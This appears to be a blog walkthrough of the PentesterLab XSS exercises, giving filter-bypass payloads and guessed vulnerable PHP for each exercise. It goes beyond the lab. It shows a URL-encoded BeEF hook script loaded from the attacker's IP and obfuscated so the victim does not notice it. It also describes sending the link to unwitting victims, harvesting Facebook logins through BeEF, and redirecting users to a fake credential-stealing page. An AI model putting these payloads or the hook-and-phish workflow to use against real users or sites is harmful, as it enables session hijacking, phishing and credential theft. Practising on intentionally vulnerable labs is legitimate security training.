Written by osmaoguzhan

PentesterLab XSS Solutions and How to Use Beef

Cross-site Scripting (XSS) is a client-side code injection attack. There 3 types of XSS.

1-Reflected XSS

2-Stored XSS

3- DOM XSS

We can execute malicious javascript code which is stealing cookie or redirecting victim anywhere.

Example1

In Example1, the first thing I tried is injecting <a> tag. I saw that the input is directly printed. After that I injected the kind of malicious script which is <script>alert(1)</script> and got the notification box as below:

Payload : <script>alert(1)<script>

After that what can we do more? Have you ever heard of Beef-XSS? Let’s inject its hook.js let’s see what can we do more.

Open the terminal on your the most loved OS which is used for pentesting. ( For this case I’m using ParrotOS) Type :

beef-xss

As you can see above, the program will give you script and the address. After opened Web UI they will ask you username and password. The default ones are beef-beef. The only thing you need to do is now injecting script beef-xss has given.

I edited with my IP Address and used URL encoding to not be understood. You can find URL Encoder online or just you can use Burp Suite for it.

.%3Cscript%20src%3D%22http%3A%2F%2F192.168.1.30%3A3000%2Fhook.js%22%3E%3C%2Fscript%3E

There is only one thing now. You gotta send the link someone.

I assume that I sent the link someone and he/she copied the link and pasted it on the search bar. Finally he/she pressed the enter and it’s finished, we got it.

After you hooked someone you can use commands under commands tab. For an instance facebook login credentials as below.

After he/she typed the credentials that are for facebook automatically beef will give you them.

Most of people don’t have any idea what is XSS. Consequently most of them will click the link you sent. By the way you don’t have to use beef for it. Also you can create a fake web page and you can type a payload to the vulnerable area as below:

<script>window.open('http://fakewebpage.com', '_blank');</script>

In the next examples, I won’t use beef. I’ll just write the payloads and take screenshots.

Example2

For this example just type <script> and check what kind of thing it turns to.

I typed the script tags and saw that the coder wrote something like:

$name= $_GET['name'];
$name=preg_replace("/<script>/","",$name);
$name=preg_replace("/<\/script>/","",$name);

So I tried to inject the script by changing a little bit. Because if you see the code we guessed, it’s just controlling <script> and </script> tags exist or not. Make one letter uppercase both of tags and see the result as below:

Payload : <sCript>alert(1)</sCript>

Example3

In this example I typed the previous payload we typed and saw that this time control is better.

The code might be like:

$name= $_GET['name'];
$name=preg_replace("/<script>/i","",$name);
$name=preg_replace("/<\/script>/i","",$name);

“i” is adding case sensitive functionality.

To bypass it we can use <img> tag or others. But if you’d like to use script tags in any case you gotta write like:

<scr<script>ipt>alert(1)</scr</script>ipt>

When the code deletes the script tags, the tags we typed separated are going to be merged.

Payload : <scr<script>ipt>alert(1)</script</script>>

Example4

When we type <script> and also when we type only script, it’s giving error:

So the code should be like:

$name= $_GET['name'];
if(preg_replace("/script/i","",$name)){
return "error";
}

To bypass this code we can use other elements like <img>.

Payload : <img src=x onerror=alert(1)>

Example5

In this example I tried to inject <script> tags with alert function and it gave me an error. But when I removed the alert function it hasn’t given any error. Thus we can understand that the coder is controlling only alert function. So the code might be like.

$name= $_GET['name'];
if(preg_replace("/alert/","",$name)){
return "error";
}

To bypass it, we can use another function that is useful. For an example you created a page which helps you to steal passwords or something like that. You can redirect the victim to your page.

<script>window.location.replace('http://www.fakewebpage.com');</script>
Payload : <script>window.location.replace(‘http://www.fakewebpage.com&#8217;);</script>

Example6

The examples are getting a little bit harder. Here the coder made something different. Our payload directly goes into tags already opened. So we need to change our payload like we are already opened tags.

When we type something it’ll be added automatically at the end of “var $a”.

To bypass it, firstly I closed the quotes and added new code line with alert.

Payload : “;alert(1);”

Example7

I typed only “<script>” and the tags has been changed as “&lt;” and “&gt;”. The coder added htmlentities function for protection. But again you can bypass it. Here is the some of entities that htmlentities function covered:

  1. <
  2. >
  4. $
  5. £
  6. &

It’s covering the entities some of entities as you can see above but not covering single quot. So again we can inject our payload by using single quot.

Payload : ‘;alert(1);’

Example8

When I type <script> it’s using post method to pass value to php file and it’s taking it as a string. This example little bit harder. But there is quite small trick here. Go to search bar and add something at the end of “example8.php”. You’ll see which things are changed.

As you can see above, you can manipulate form tag. Just close the action element and type payload.

Payload : ” onmouseover=”alert(1)

When you get the mouse over the form area it’ll work. This method is quite useful. Keep that in mind.

That’s all thanks for reading! See you soon!!

Leave a comment